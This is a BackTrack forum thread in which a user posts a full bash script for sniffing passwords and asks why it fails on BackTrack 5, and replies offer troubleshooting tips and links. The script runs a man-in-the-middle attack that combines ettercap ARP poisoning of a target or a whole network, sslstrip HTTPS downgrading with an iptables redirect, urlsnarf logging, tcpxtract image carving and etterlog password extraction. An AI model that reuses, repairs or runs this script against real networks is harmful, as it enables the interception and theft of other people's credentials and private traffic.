Results 1 to 4 of 4

Thread: password sniffing in BT 5

  1. #1
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    6

    Default password sniffing in BT 5

    Code:
    #!/bin/bash
    echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
    read -e NOYES
    echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
    read -e XTRACT
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
    read -e SESSION
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    mkdir /root/$SESSION/
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    sslstrip -p -k -w /root/$SESSION/$SESSION.log &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
    ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
    "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
    "$NOYES"wireshark &
    killall sslstrip
    killall python
    killall urlsnarf
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    The above script used to work perfectly in BT 4 but it fails to work correctly in BT 5
    it didnt work first time i ran it so i checked which part of the script is not working and i found out that sslstrip is not working b'cz it was not installed yet so i installed sslstrip then i checked again if the script works but this time the internet becomes so so so slow or no internet at all ( its only me in the network ) and it didnt capture any paasword . Can u pls tell me whats wrong in this script ?? and how can i modify it to suit BT 5 ??

    sorry for my bad english .. !!

  2. #2
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re : password sniffing in BT 5

    Sslstrip IS installed... I just did a chmod +x /pentest/web/sslstrip/sslstrip.py
    It gets buggy with python though. But it works. I made a script too if you're interested (compatible with BT5 of course) : http://comax.pagesperso-orange.fr.
    Hope this helps !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: password sniffing in BT 5

    See this thread for sslstrip fixes:
    http://www.backtrack-linux.org/forum...p-wifizoo.html
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: password sniffing in BT 5

    Quote Originally Posted by thorin View Post
    See this thread for sslstrip fixes:
    http://www.backtrack-linux.org/forum...p-wifizoo.html
    It says how to install sslstrip, but does that get rid of the python errors ? I must confess I did install it, but didn't try it after...

    (I'm asking the question so that a next reader has an answer, but I'll find out for my self. And update this post if I do that before anyone answers)
    Running both KDE and GNOME BT5 flawlessly. Thank you !

Similar Threads

  1. Problem with Password Sniffing with SSLStrip
    By Eatme in forum Beginners Forum
    Replies: 7
    Last Post: 10-01-2010, 08:24 AM
  2. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  3. Sickness - Password Sniffing Reloaded.
    By sickness in forum BackTrack Videos
    Replies: 8
    Last Post: 02-06-2010, 01:12 PM
  4. Strange Password Sniffing Problem
    By TheVinMeister in forum OLD Newbie Area
    Replies: 1
    Last Post: 07-30-2008, 01:48 PM
  5. Sniffing MSN password on a network.
    By Dissident85 in forum OLD Newbie Area
    Replies: 6
    Last Post: 07-03-2008, 10:15 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •